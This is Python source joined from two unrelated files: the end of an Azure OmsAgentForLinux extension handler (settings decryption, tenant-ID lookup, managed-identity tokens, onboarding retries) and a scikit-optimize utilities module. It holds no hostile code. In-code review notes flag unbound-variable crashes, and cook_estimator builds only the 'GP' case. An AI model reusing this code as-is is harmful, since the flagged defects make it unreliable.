    locked after all retries have been exhausted; otherwise pass the
    exit code through unchanged.
    """
    if is_dpkg_locked(exit_code, output):
        return DPKGLockedErrorCode
    return exit_code
def retry_onboarding(exit_code, output):
    """
    Retry under any of these conditions:
    - If the onboarding request returns 403: this may indicate that the agent
      GUID and certificate should be re-generated
    - If the onboarding request returns a different non-200 code: the OMS
      service may be temporarily unavailable
    - If the onboarding curl command returns an unaccounted-for error code,
      we should retry with verbose logging
    Returns (should_retry, retry_message, retry_verbosely).
    """
    retry_verbosely = False
    # Fixed: '==' instead of 'is' — identity comparison against int
    # constants relies on CPython small-int interning
    if exit_code == EnableErrorOMSReturned403:
        return True, 'Retrying the onboarding command to attempt generating ' \
                     'a new agent ID and certificate.', retry_verbosely
    elif exit_code == EnableErrorOMSReturnedNon200:
        return True, 'Retrying; the OMS service may be temporarily ' \
                     'unavailable.', retry_verbosely
    elif exit_code == EnableErrorOnboarding:
        return True, 'Retrying with verbose logging.', True
    return False, '', False
def raise_if_no_internet(exit_code, output):
    """
    Raise the CannotConnectToOMSException exception if the onboarding
    script returns the error code indicating that the OMS service can't be
    resolved; otherwise pass the exit code through unchanged.
    """
    # Fixed: '==' instead of 'is' for the int-constant comparison
    if exit_code == EnableErrorResolvingHost:
        raise CannotConnectToOMSException
    return exit_code
def get_settings():
    """
    Retrieve the configuration for this extension operation.

    Returns a (public_settings, protected_settings) tuple. Sources are
    tried in order: the handler utility object (HUtilObject), the cached
    module-level SettingsDict, and finally the latest <seq_no>.settings
    file on disk, decrypting the protected section via openssl when a
    certificate thumbprint is present.
    """
    global SettingsDict
    public_settings = None
    protected_settings = None
    if HUtilObject is not None:
        # The handler utility parses settings for us
        public_settings = HUtilObject.get_public_settings()
        protected_settings = HUtilObject.get_protected_settings()
    elif SettingsDict is not None:
        # Settings were already parsed by a previous call; use the cache
        public_settings = SettingsDict['public_settings']
        protected_settings = SettingsDict['protected_settings']
    else:
        # Parse the settings file of the latest sequence number ourselves
        SettingsDict = {}
        handler_env = get_handler_env()
        try:
            config_dir = str(handler_env['handlerEnvironment']['configFolder'])
        except:
            # Fall back to ./config when the handler environment is missing
            config_dir = os.path.join(os.getcwd(), 'config')
        seq_no = get_latest_seq_no()
        settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
        try:
            with open(settings_path, 'r') as settings_file:
                settings_txt = settings_file.read()
            settings = json.loads(settings_txt)
            h_settings = settings['runtimeSettings'][0]['handlerSettings']
            public_settings = h_settings['publicSettings']
            SettingsDict['public_settings'] = public_settings
        except:
            # NOTE(review): if this read/parse fails, h_settings is never
            # bound and the reference below raises NameError — confirm
            # whether callers rely on the resulting crash or this should
            # abort earlier
            hutil_log_error('Unable to load handler settings from ' \
                            '{0}'.format(settings_path))
        # Protected settings, when present, are base64-encoded and
        # encrypted against the certificate waagent dropped for the
        # recorded thumbprint
        if ('protectedSettings' in h_settings
                and 'protectedSettingsCertThumbprint' in h_settings
                and h_settings['protectedSettings'] is not None
                and h_settings['protectedSettingsCertThumbprint'] is not None):
            encoded_settings = h_settings['protectedSettings']
            settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
            encoded_cert_path = os.path.join('/var/lib/waagent',
                                             '{0}.crt'.format(
                                                       settings_thumbprint))
            encoded_key_path = os.path.join('/var/lib/waagent',
                                            '{0}.prv'.format(
                                                      settings_thumbprint))
            decoded_settings = base64.standard_b64decode(encoded_settings)
            # Decrypt with openssl using the cert/key pair above
            decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
                          '-inkey {1}'.format(encoded_cert_path,
                                              encoded_key_path)
            try:
                session = subprocess.Popen([decrypt_cmd], shell = True,
                                           stdin = subprocess.PIPE,
                                           stderr = subprocess.STDOUT,
                                           stdout = subprocess.PIPE)
                output = session.communicate(decoded_settings)
            except OSError:
                # NOTE(review): 'output' stays unbound when Popen raises,
                # so the subscript below would raise NameError — confirm
                pass
            # communicate() returns (stdout, stderr); stdout holds the
            # decrypted JSON text
            protected_settings_str = output[0]
            if protected_settings_str is None:
                log_and_exit('Enable', 1, 'Failed decrypting ' \
                                          'protectedSettings')
            protected_settings = ''
            try:
                protected_settings = json.loads(protected_settings_str)
            except:
                hutil_log_error('JSON exception decoding protected settings')
        SettingsDict['protected_settings'] = protected_settings
    return public_settings, protected_settings
def update_status_file(operation, exit_code, exit_status, message):
    """
    Mimic HandlerUtil method do_status_report in case hutil method is not
    available.

    Writes a single-entry status JSON document for the latest settings
    sequence number, using a write-to-temp-then-rename pattern.
    """
    handler_env = get_handler_env()
    try:
        extension_version = str(handler_env['version'])
        status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
    except:
        extension_version = "1.0"
        status_dir = os.path.join(os.getcwd(), 'status')

    status_entry = {
        "name" : "Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux",
        "operation" : operation,
        "status" : exit_status,
        "code" : exit_code,
        "formattedMessage" : {
            "lang" : "en-US",
            "message" : message
        }
    }
    status_doc = [{
        "version" : extension_version,
        "timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "status" : status_entry
    }]
    status_json = json.dumps(status_doc)

    # Find the most recently changed config file and then use the
    # corresponding status file
    seq_no = get_latest_seq_no()
    status_path = os.path.join(status_dir, '{0}.status'.format(seq_no))
    tmp_path = '{0}.tmp'.format(status_path)
    with open(tmp_path, 'w+') as tmp_file:
        tmp_file.write(status_json)
    os.rename(tmp_path, status_path)
def get_handler_env():
    """
    Set and retrieve the contents of HandlerEnvironment.json as JSON.

    The parsed value is cached in the global HandlerEnvironment so the file
    is read at most once; read errors are logged and leave the cache None.
    """
    global HandlerEnvironment
    if HandlerEnvironment is None:
        env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
        try:
            with open(env_path, 'r') as env_file:
                parsed_env = json.loads(env_file.read())
            # Some agents wrap the environment object in a one-element list
            if type(parsed_env) == list:
                parsed_env = parsed_env[0]
            HandlerEnvironment = parsed_env
        except Exception as e:
            waagent_log_error(str(e))
    return HandlerEnvironment
def get_latest_seq_no():
    """
    Determine the latest operation settings number to use.

    Scans the config directory for <seq_no>.settings files and caches the
    sequence number of the most recently modified one in the global
    SettingsSequenceNumber; defaults to 0 when none is found.
    """
    global SettingsSequenceNumber
    if SettingsSequenceNumber is None:
        handler_env = get_handler_env()
        try:
            config_dir = str(handler_env['handlerEnvironment']['configFolder'])
        except:
            config_dir = os.path.join(os.getcwd(), 'config')

        latest_seq_no = -1
        latest_time = None
        try:
            for dir_name, sub_dirs, file_names in os.walk(config_dir):
                for file_name in file_names:
                    file_basename = os.path.basename(file_name)
                    match = re.match(r'[0-9]{1,10}\.settings', file_basename)
                    if match is None:
                        continue
                    cur_seq_no = int(file_basename.split('.')[0])
                    # Fixed: join against the directory os.walk is currently
                    # visiting (dir_name), not the walk root; the original
                    # joined config_dir, which produced wrong paths for
                    # settings files in subdirectories and aborted the scan
                    file_path = os.path.join(dir_name, file_name)
                    cur_time = os.path.getmtime(file_path)
                    if latest_time is None or cur_time > latest_time:
                        latest_time = cur_time
                        latest_seq_no = cur_seq_no
        except:
            pass
        if latest_seq_no < 0:
            latest_seq_no = 0
        SettingsSequenceNumber = latest_seq_no
    return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
    """
    Mimic waagent method RunGetOutput in case waagent is not available.
    Run shell command and return exit code and output; output is a
    stripped str on both python 2 and python 3.
    """
    if 'Utils.WAAgentUtil' in sys.modules:
        # WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
        # If checking the number of parameters fails, pass 2
        try:
            # inspect.signature exists on python 3 only
            sig = inspect.signature(waagent.RunGetOutput)
            params = sig.parameters
            waagent_params = len(params)
        except:
            try:
                # python 2 fallback (getargspec is removed in python 3.11)
                spec = inspect.getargspec(waagent.RunGetOutput)
                params = spec.args
                waagent_params = len(params)
            except:
                waagent_params = 2
        if waagent_params >= 3:
            exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
        else:
            exit_code, output = waagent.RunGetOutput(cmd, chk_err)
    else:
        # waagent is not importable: run the command ourselves through a shell
        try:
            output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
                                             shell = True)
            # latin-1 maps every byte, so this decode cannot fail on
            # arbitrary command output
            output = output.decode('latin-1')
            exit_code = 0
        except subprocess.CalledProcessError as e:
            # Non-zero exit: CalledProcessError carries both code and output
            exit_code = e.returncode
            output = e.output.decode('latin-1')
    # NOTE(review): encode('utf-8', 'ignore') drops characters latin-1
    # produced that are then re-decoded below; the round-trip looks
    # redundant on python 3 but is kept for python 2 compatibility — confirm
    output = output.encode('utf-8', 'ignore')
    # On python 3, encode returns a byte object, so we must decode back to a string
    if sys.version_info >= (3,):
        output = output.decode()
    return exit_code, output.strip()
def get_tenant_id_from_metadata_api(vm_resource_id):
    """
    Retrieve the Tenant ID using the Metadata API of the VM resource ID.
    Since we have not authenticated, the Metadata API will throw a 401, but
    the headers of the 401 response will contain the tenant ID.

    Raises MetadataAPIException when the expected header or its
    authorization_uri format is missing.
    """
    metadata_endpoint = get_metadata_api_endpoint(vm_resource_id)
    metadata_request = urllib.request.Request(metadata_endpoint)
    try:
        # This request should fail with code 401
        metadata_response = urllib.request.urlopen(metadata_request)
        hutil_log_info('Request to Metadata API did not fail as expected; ' \
                       'attempting to use headers from response to ' \
                       'determine Tenant ID')
        metadata_headers = metadata_response.headers
    except urllib.error.HTTPError as e:
        metadata_headers = e.headers

    if metadata_headers is None or 'WWW-Authenticate' not in metadata_headers:
        raise MetadataAPIException('Expected information from Metadata API ' \
                                   'is not present')

    auth_header = metadata_headers['WWW-Authenticate']
    auth_header_regex = r'authorization_uri=\"https:\/\/login\.windows\.net/(' + GUIDRegex + ')\"'
    auth_header_matches = re.search(auth_header_regex, auth_header)
    if not auth_header_matches:
        raise MetadataAPIException('The WWW-Authenticate header in the ' \
                                   'response does not contain expected ' \
                                   'authorization_uri format')
    tenant_id = auth_header_matches.group(1)
    return tenant_id
def get_metadata_api_endpoint(vm_resource_id):
    """
    Extrapolate Metadata API endpoint from VM Resource ID.
    Example VM resource ID: /subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup/providers/Microsoft.Compute/virtualMachines/lagalbraOCUb16C
    Corresponding example endpoint: https://management.azure.com/subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup?api-version=2016-09-01

    Raises InvalidParameterError when the resource ID does not parse.
    """
    # Will match for ARM and Classic VMs, Availability Sets, VM Scale Sets
    vm_resource_id_regex = r'^\/subscriptions\/(' + GUIDRegex + ')\/' \
                           'resourceGroups\/([^\/]+)\/providers\/Microsoft' \
                           '\.(?:Classic){0,1}Compute\/(?:virtualMachines|' \
                           'availabilitySets|virtualMachineScaleSets)' \
                           '\/[^\/]+$'
    id_matches = re.search(vm_resource_id_regex, vm_resource_id, re.M)
    if id_matches is None:
        raise InvalidParameterError('VM Resource ID is invalid')

    subscription_id = id_matches.group(1)
    resource_group = id_matches.group(2)
    base_url = 'https://management.azure.com/subscriptions/{0}' \
               '/resourceGroups/{1}'.format(subscription_id, resource_group)
    query_string = urllib.parse.urlencode({'api-version' : '2016-09-01'})
    return '{0}?{1}'.format(base_url, query_string)
def get_access_token(tenant_id, resource):
    """
    Retrieve an OAuth access token for *resource*.

    Sends an OAuth2 token exchange request to the local URL that the
    ManagedIdentity extension is listening on.

    Raises ManagedIdentityExtException when the listening URL cannot be
    read or the token exchange fails.
    """
    # Extract the endpoint that the ManagedIdentity extension is listening on
    with open(ManagedIdentityExtListeningURLPath, 'r') as listening_file:
        listening_settings_txt = listening_file.read()
    try:
        listening_settings = json.loads(listening_settings_txt)
        listening_url = listening_settings['url']
    except Exception:
        raise ManagedIdentityExtException('Could not extract listening URL ' \
                                          'from settings file')

    # Send an OAuth token exchange request. urlopen() requires the POST
    # body to be bytes in Python 3, so encode the urlencoded form data.
    oauth_data = {'authority' : 'https://login.microsoftonline.com/' \
                                '{0}'.format(tenant_id),
                  'resource' : resource
    }
    oauth_request = urllib.request.Request(
        listening_url + '/oauth2/token',
        urllib.parse.urlencode(oauth_data).encode('utf-8'))
    oauth_request.add_header('Metadata', 'true')

    try:
        oauth_response = urllib.request.urlopen(oauth_request)
        oauth_response_txt = oauth_response.read()
    except urllib.error.HTTPError as e:
        hutil_log_error('Request to ManagedIdentity extension listening URL ' \
                        'failed with an HTTPError: {0}'.format(e))
        hutil_log_info('Response from ManagedIdentity extension: ' \
                       '{0}'.format(e.read()))
        raise ManagedIdentityExtException('Request to listening URL failed ' \
                                          'with HTTPError {0}'.format(e))
    except Exception:
        raise ManagedIdentityExtException('Unexpected error from request to ' \
                                          'listening URL')

    try:
        oauth_response_json = json.loads(oauth_response_txt)
    except ValueError:
        raise ManagedIdentityExtException('Error parsing JSON from ' \
                                          'listening URL response')

    if (oauth_response_json is not None
            and 'access_token' in oauth_response_json):
        return oauth_response_json['access_token']
    raise ManagedIdentityExtException('Could not retrieve access token ' \
                                      'in the listening URL response')
def get_workspace_info_from_oms(vm_resource_id, tenant_id, access_token):
    """
    Ask the OMS service which workspace the OMSAgent should onboard to.

    Posts the VM resource ID, tenant ID and access token to the OMS
    validation endpoint, retrying while the managed workspace is still
    being provisioned.

    Returns the parsed JSON response (must contain 'WorkspaceId' and
    'WorkspaceKey'); raises on any failure.
    """
    oms_data = {'ResourceId' : vm_resource_id,
                'TenantId' : tenant_id,
                'JwtToken' : access_token
    }
    # urlopen() requires the POST body as bytes in Python 3
    oms_request_json = json.dumps(oms_data).encode('utf-8')
    oms_request = urllib.request.Request(OMSServiceValidationEndpoint)
    oms_request.add_header('Content-Type', 'application/json')

    retries = 5
    initial_sleep_time = AutoManagedWorkspaceCreationSleepSeconds
    # NOTE(review): a factor of 1 keeps the retry delay constant; confirm
    # whether exponential backoff was intended here
    sleep_increase_factor = 1
    try_count = 0
    sleep_time = initial_sleep_time

    # Workspace may not be provisioned yet; sleep and retry if
    # provisioning has been accepted
    while try_count <= retries:
        try:
            oms_response = urllib.request.urlopen(oms_request, oms_request_json)
            oms_response_txt = oms_response.read()
        except urllib.error.HTTPError as e:
            hutil_log_error('Request to OMS threw HTTPError: {0}'.format(e))
            hutil_log_info('Response from OMS: {0}'.format(e.read()))
            raise OMSServiceOneClickException('ValidateMachineIdentity ' \
                                              'request returned an error ' \
                                              'HTTP code: {0}'.format(e))
        except Exception:
            raise OMSServiceOneClickException('Unexpected error from ' \
                                              'ValidateMachineIdentity ' \
                                              'request')

        should_retry = retry_get_workspace_info_from_oms(oms_response)
        if not should_retry:
            # Workspace is provisioned; stop polling
            break
        elif try_count == retries:
            # Retries exhausted while OMS still reports "provisioning"
            hutil_log_error('Retries for ValidateMachineIdentity request ran ' \
                            'out: required workspace information cannot be ' \
                            'extracted')
            raise OneClickException('Workspace provisioning did not complete ' \
                                    'within the allotted time')

        try_count += 1
        time.sleep(sleep_time)
        sleep_time *= sleep_increase_factor

    if not oms_response_txt:
        raise OMSServiceOneClickException('Body from ValidateMachineIdentity ' \
                                          'response is empty; required ' \
                                          'workspace information cannot be ' \
                                          'extracted')
    try:
        oms_response_json = json.loads(oms_response_txt)
    except ValueError:
        raise OMSServiceOneClickException('Error parsing JSON from ' \
                                          'ValidateMachineIdentity response')

    if (oms_response_json is not None and 'WorkspaceId' in oms_response_json
            and 'WorkspaceKey' in oms_response_json):
        return oms_response_json
    hutil_log_error('Could not retrieve both workspace ID and key from ' \
                    'the OMS service response {0}; cannot determine ' \
                    'workspace ID and key'.format(oms_response_json))
    raise OMSServiceOneClickException('Required workspace information ' \
                                      'was not found in the ' \
                                      'ValidateMachineIdentity response')
def retry_get_workspace_info_from_oms(oms_response):
    """
    Return True when the ValidateMachineIdentity request should be retried.

    OMS answers 202/204/404 while a managed workspace is still being
    provisioned; any other code means provisioning is finished.
    """
    try:
        oms_response_http_code = oms_response.getcode()
    except Exception:
        hutil_log_error('Unable to get HTTP code from OMS response')
        return False

    # Compare values, not identity: the original used 'is', which silently
    # fails for ints above 256 (e.g. 404) that CPython does not intern.
    if oms_response_http_code in (202, 204, 404):
        hutil_log_info('Retrying ValidateMachineIdentity OMS request ' \
                       'because workspace is still being provisioned; HTTP ' \
                       'code from OMS is {0}'.format(oms_response_http_code))
        return True
    else:
        hutil_log_info('Workspace is provisioned; HTTP code from OMS is ' \
                       '{0}'.format(oms_response_http_code))
        return False
def init_waagent_logger():
    """Initialize the waagent logger, swallowing any failure (for example
    when waagent could not be imported)."""
    try:
        waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
    except Exception as e:
        message = 'Unable to initialize waagent log because of exception ' \
                  '{0}'.format(e)
        print(message)
def waagent_log_info(message):
    """Log an informational message via waagent when it was imported,
    falling back to stdout otherwise."""
    if 'Utils.WAAgentUtil' not in sys.modules:
        print('Info: {0}'.format(message))
    else:
        waagent.Log(message)
def waagent_log_error(message):
    """Log an error message via waagent when it was imported, falling back
    to stdout otherwise."""
    if 'Utils.WAAgentUtil' not in sys.modules:
        print('Error: {0}'.format(message))
    else:
        waagent.Error(message)
def hutil_log_info(message):
    """Log an informational message via the handler utility when it is
    configured, falling back to stdout otherwise."""
    if HUtilObject is None:
        print('Info: {0}'.format(message))
    else:
        HUtilObject.log(message)
def hutil_log_error(message):
    """Log an error message via the handler utility when it is configured,
    falling back to stdout otherwise."""
    if HUtilObject is None:
        print('Error: {0}'.format(message))
    else:
        HUtilObject.error(message)
def log_and_exit(operation, exit_code = 1, message = ''):
    """
    Log the exit message through both loggers and terminate the process.

    Reports the final status through the handler utility when available;
    otherwise writes the status file directly and exits with exit_code.
    """
    # Compare values with ==, not 'is' (identity comparison of ints is an
    # implementation detail and an anti-pattern)
    if exit_code == 0:
        waagent_log_info(message)
        hutil_log_info(message)
        exit_status = 'success'
    else:
        waagent_log_error(message)
        hutil_log_error(message)
        exit_status = 'failed'

    if HUtilObject is not None:
        HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
                            message)
    else:
        update_status_file(operation, str(exit_code), exit_status, message)
        sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class OmsAgentForLinuxException(Exception):
    """
    Base class for all extension exceptions.

    Its error code is the basic error code traditionally returned in
    Linux: 1.
    """
    error_code = 1

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = '{0} failed with exit code {1}'
        return template.format(operation, self.error_code)
class ParameterMissingException(OmsAgentForLinuxException):
    """
    Raised when a parameter for the OmsAgentForLinux extension is missing.
    """
    error_code = MissingorInvalidParameterErrorCode

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = '{0} failed due to a missing parameter: {1}'
        return template.format(operation, self)
class InvalidParameterError(OmsAgentForLinuxException):
    """
    Raised when a parameter for the OmsAgentForLinux extension is invalid,
    e.g. a workspace ID that does not match the GUID regex.
    """
    error_code = MissingorInvalidParameterErrorCode

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = '{0} failed due to an invalid parameter: {1}'
        return template.format(operation, self)
class UnwantedMultipleConnectionsException(OmsAgentForLinuxException):
    """
    Raised when this VM is already connected to a different Log Analytics
    workspace and stopOnMultipleConnections is set to true.
    """
    error_code = UnwantedMultipleConnectionsErrorCode

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = '{0} failed due to multiple connections: {1}'
        return template.format(operation, self)
class CannotConnectToOMSException(OmsAgentForLinuxException):
    """
    Raised when the OMSAgent cannot connect to the OMS service.
    """
    # Error code indicating no internet access
    error_code = CannotConnectToOMSErrorCode

    def get_error_message(self, operation):
        """Return a fixed, user-facing connectivity error message."""
        return ('The agent could not connect to the Microsoft Operations '
                'Management Suite service. Please check that the system '
                'either has Internet access, or that a valid HTTP proxy has '
                'been configured for the agent. Please also check the '
                'correctness of the workspace ID.')
class OneClickException(OmsAgentForLinuxException):
    """
    Generic exception for OneClick-related issues.
    """
    error_code = OneClickErrorCode

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = 'Encountered an issue related to the OneClick scenario: {0}'
        return template.format(self)
class ManagedIdentityExtMissingException(OneClickException):
    """
    Raised when the ManagedIdentity extension (required for the OneClick
    scenario) is not present.
    """
    error_code = ManagedIdentityExtMissingErrorCode

    def get_error_message(self, operation):
        """Return a fixed, user-facing message with remediation steps."""
        return ('The ManagedIdentity extension is required to be installed '
                'for Automatic Management to be enabled. Please set '
                'EnableAutomaticManagement to false in public settings or '
                'install the ManagedIdentityExtensionForLinux Azure VM '
                'extension.')
class ManagedIdentityExtException(OneClickException):
    """
    Raised on any issue with ManagedIdentityExtensionForLinux.
    """
    error_code = ManagedIdentityExtErrorCode

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = 'Encountered an issue with the ManagedIdentity extension: {0}'
        return template.format(self)
class MetadataAPIException(OneClickException):
    """
    Raised on any issue with the Metadata API.
    """
    error_code = MetadataAPIErrorCode

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = 'Encountered an issue with the Metadata API: {0}'
        return template.format(self)
class OMSServiceOneClickException(OneClickException):
    """
    Raised when prerequisites were satisfied but the managed workspace
    information could not be retrieved from the OMS service.
    """
    error_code = OMSServiceOneClickErrorCode

    def get_error_message(self, operation):
        """Return a descriptive error message for this exception type."""
        template = 'Encountered an issue with the OMS service: {0}'
        return template.format(self)
# Script entry point: delegate to main(), defined earlier in this file
if __name__ == '__main__' :
    main()
|
utils.py | # from sklearn.gaussian_process.kernels import ConstantKernel
# from sklearn.gaussian_process.kernels import Matern
# the sklearn kernels do not implement gradients!
from skopt.learning.gaussian_process.kernels import ConstantKernel
from skopt.learning.gaussian_process.kernels import HammingKernel
from skopt.learning.gaussian_process.kernels import Matern
from skopt.learning import GaussianProcessRegressor
from skopt.space import Space, Categorical, Integer, Real, Dimension
from scipy.optimize import OptimizeResult
from sklearn.utils import check_random_state
import numpy as np
import socket
import os
import threading
import queue
import time
import matplotlib.pyplot as plt
from matplotlib.pyplot import cm
plt.style.use('seaborn')
def normalize_dimensions(dimensions):
    """Create a ``Space`` where all dimensions are normalized to unit range.

    This is particularly useful for Gaussian process based regressors and is
    used internally by ``gp_minimize``.

    Parameters
    ----------
    dimensions : list, shape (n_dims,)
        List of search space dimensions.
        Each search dimension can be defined either as

        - a `(lower_bound, upper_bound)` tuple (for `Real` or `Integer`
          dimensions),
        - a `(lower_bound, upper_bound, "prior")` tuple (for `Real`
          dimensions),
        - as a list of categories (for `Categorical` dimensions), or
        - an instance of a `Dimension` object (`Real`, `Integer` or
          `Categorical`).

        NOTE: The upper and lower bounds are inclusive for `Integer`
        dimensions.
    """
    normalized = []
    for dim in Space(dimensions).dimensions:
        # Each branch rebuilds the dimension with transform="normalize"
        # so that the GP operates in the [0, 1] space.
        if isinstance(dim, Categorical):
            new_dim = Categorical(dim.categories, dim.prior,
                                  name=dim.name,
                                  transform="normalize")
        elif isinstance(dim, Real):
            new_dim = Real(dim.low, dim.high, dim.prior,
                           name=dim.name,
                           transform="normalize",
                           dtype=dim.dtype)
        elif isinstance(dim, Integer):
            new_dim = Integer(dim.low, dim.high,
                              name=dim.name,
                              transform="normalize",
                              dtype=dim.dtype)
        else:
            raise RuntimeError("Unknown dimension type "
                               "(%s)" % type(dim))
        normalized.append(new_dim)
    return Space(normalized)
def cook_estimator(base_estimator, space=None, **kwargs):
    """Cook a default estimator.

    For the special base_estimator called "DUMMY" the return value is None.
    This corresponds to sampling points at random, hence there is no need
    for an estimator.

    Parameters
    ----------
    base_estimator : "GP", "RF", "ET", "GBRT", "DUMMY" or sklearn regressor
        Should inherit from `sklearn.base.RegressorMixin`.
        In addition the `predict` method should have an optional `return_std`
        argument, which returns `std(Y | x)`` along with `E[Y | x]`.
        If base_estimator is one of ["GP", "RF", "ET", "GBRT", "DUMMY"], a
        surrogate model corresponding to the relevant `X_minimize` function
        is created.
    space : Space instance
        Has to be provided if the base_estimator is a gaussian process.
        Ignored otherwise.
    kwargs : dict
        Extra parameters provided to the base_estimator at init time.
    """
    # is_regressor is not imported at module level in this file; import it
    # here so the check below does not raise NameError for estimator objects.
    from sklearn.base import is_regressor

    if isinstance(base_estimator, str):
        base_estimator = base_estimator.upper()
        if base_estimator not in ["GP", "ET", "RF", "GBRT", "DUMMY"]:
            raise ValueError("Valid strings for the base_estimator parameter "
                             " are: 'RF', 'ET', 'GP', 'GBRT' or 'DUMMY' not "
                             "%s." % base_estimator)
    elif not is_regressor(base_estimator):
        raise ValueError("base_estimator has to be a regressor.")

    if base_estimator == "GP":
        if space is not None:
            space = Space(space)
            space = Space(normalize_dimensions(space.dimensions))
            n_dims = space.transformed_n_dims
            is_cat = space.is_categorical
        else:
            raise ValueError("Expected a Space instance, not None.")

        cov_amplitude = ConstantKernel(1.0, (0.01, 1000.0))
        # The Hamming kernel is only appropriate when *all* dimensions
        # are categorical; otherwise use a Matern kernel.
        if is_cat:
            other_kernel = HammingKernel(length_scale=np.ones(n_dims))
        else:
            other_kernel = Matern(
                length_scale=np.ones(n_dims),
                length_scale_bounds=[(0.01, 100)] * n_dims, nu=2.5)
        base_estimator = GaussianProcessRegressor(
            kernel=cov_amplitude * other_kernel,
            normalize_y=True, noise="gaussian",
            n_restarts_optimizer=2)
    # NOTE(review): the visible code only builds a "GP" surrogate; other
    # string values fall through to set_params on the string — confirm the
    # remaining branches exist in the full module.

    # Drop n_jobs when the chosen estimator does not support it
    if ('n_jobs' in kwargs) and not hasattr(base_estimator, 'n_jobs'):
        del kwargs['n_jobs']
    base_estimator.set_params(**kwargs)
    return base_estimator
def get_host_ip_address():
    """Get the host ip address of the machine where the executor is running.

    Falls back to resolving 'localhost', then to the sentinel string
    'ip_address_NA' when no resolution is possible.

    Returns
    -------
    host_ip : String
    """
    # Name-resolution failures raise OSError (socket.gaierror/herror are
    # subclasses); catch that instead of a bare except.
    try:
        return socket.gethostbyname(socket.gethostname())
    except OSError:
        try:
            return socket.gethostbyname('localhost')
        except OSError:
            return 'ip_address_NA'
def is_port_available(port):
    """Check whether the given port can be bound on the localhost interface.

    Returns
    -------
    result : boolean
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        localhost_ip = socket.gethostbyname("localhost")
        sock.bind((localhost_ip, port))
        result = True
    except OSError:
        # Bind failure (port in use, permission denied, resolution error)
        # means the port is not available.
        result = False
    finally:
        # Always release the probe socket, even on unexpected errors
        sock.close()
    return result
def get_available_port(default_port=8787):
    """Return the first available port at or above the given starting port.

    Probes ports one by one, incrementing by 1 while the candidate is
    unavailable.

    Returns
    -------
    default_port : int
    """
    candidate = default_port
    while True:
        if is_port_available(candidate):
            return candidate
        candidate += 1
def create_result(Xi, yi, space=None, rng=None, specs=None, models=None):
    """
    Initialize an `OptimizeResult` object.

    Parameters
    ----------
    Xi : list of lists, shape (n_iters, n_features)
        Location of the minimum at every iteration.
    yi : array-like, shape (n_iters,)
        Minimum value obtained at every iteration.
    space : Space instance, optional
        Search space.
    rng : RandomState instance, optional
        State of the random state.
    specs : dict, optional
        Call specifications.
    models : list, optional
        List of fit surrogate models.

    Returns
    -------
    res : `OptimizeResult`, scipy object
        OptimizeResult instance with the required information.
    """
    res = OptimizeResult()
    yi = np.asarray(yi)
    # A 2-d yi carries (objective, elapsed-time) pairs per iteration;
    # split them into func_vals and log_time.
    if yi.ndim == 2:
        res.log_time = np.ravel(yi[:, 1])
        yi = np.ravel(yi[:, 0])
    best_index = np.argmin(yi)
    res.x = Xi[best_index]
    res.fun = yi[best_index]
    res.func_vals = yi
    res.x_iters = Xi
    res.models = models
    res.space = space
    res.random_state = rng
    res.specs = specs
    return res
def plot_convergence(*args, **kwargs):
    """Plot one or several convergence traces.

    Parameters
    ----------
    args[i] : `OptimizeResult`, list of `OptimizeResult`, or tuple
        The result(s) for which to plot the convergence trace.

        - if `OptimizeResult`, then draw the corresponding single trace;
        - if list of `OptimizeResult`, then draw the corresponding convergence
          traces in transparency, along with the average convergence trace;
        - if tuple, then `args[i][0]` should be a string label and `args[i][1]`
          an `OptimizeResult` or a list of `OptimizeResult`.

    ax : `Axes`, optional
        The matplotlib axes on which to draw the plot, or `None` to create
        a new one.

    true_minimum : float, optional
        The true minimum value of the function, if known.

    yscale : None or string, optional
        The scale for the y-axis.

    Returns
    -------
    ax : `Axes`
        The matplotlib axes.
    """
    # <3 legacy python
    # Keyword-only options are pulled out of kwargs by hand (pre-PEP 3102
    # style so the *args form can stay fully variadic).
    ax = kwargs.get("ax", None)
    true_minimum = kwargs.get("true_minimum", None)
    yscale = kwargs.get("yscale", None)

    if ax is None:
        ax = plt.gca()

    ax.set_title("Convergence plot")
    ax.set_xlabel("Number of calls $n$")
    ax.set_ylabel(r"$\min f(x)$ after $n$ calls")
    ax.grid()

    if yscale is not None:
        ax.set_yscale(yscale)

    # One distinct color per positional argument (trace or group of traces)
    colors = cm.viridis(np.linspace(0.25, 1.0, len(args)))

    for results, color in zip(args, colors):
        # An (label, results) tuple carries an explicit legend label
        if isinstance(results, tuple):
            name, results = results
        else:
            name = None

        if isinstance(results, OptimizeResult):
            # Single trace: running minimum of the objective values
            n_calls = len(results.x_iters)
            mins = [np.min(results.func_vals[:i])
                    for i in range(1, n_calls + 1)]
            ax.plot(range(1, n_calls + 1), mins, c=color,
                    marker=".", markersize=12, lw=2, label=name)
        elif isinstance(results, list):
            # Group of traces: individual runs in transparency plus the
            # mean convergence trace on top
            n_calls = len(results[0].x_iters)
            iterations = range(1, n_calls + 1)
            mins = [[np.min(r.func_vals[:i]) for i in iterations]
                    for r in results]
            for m in mins:
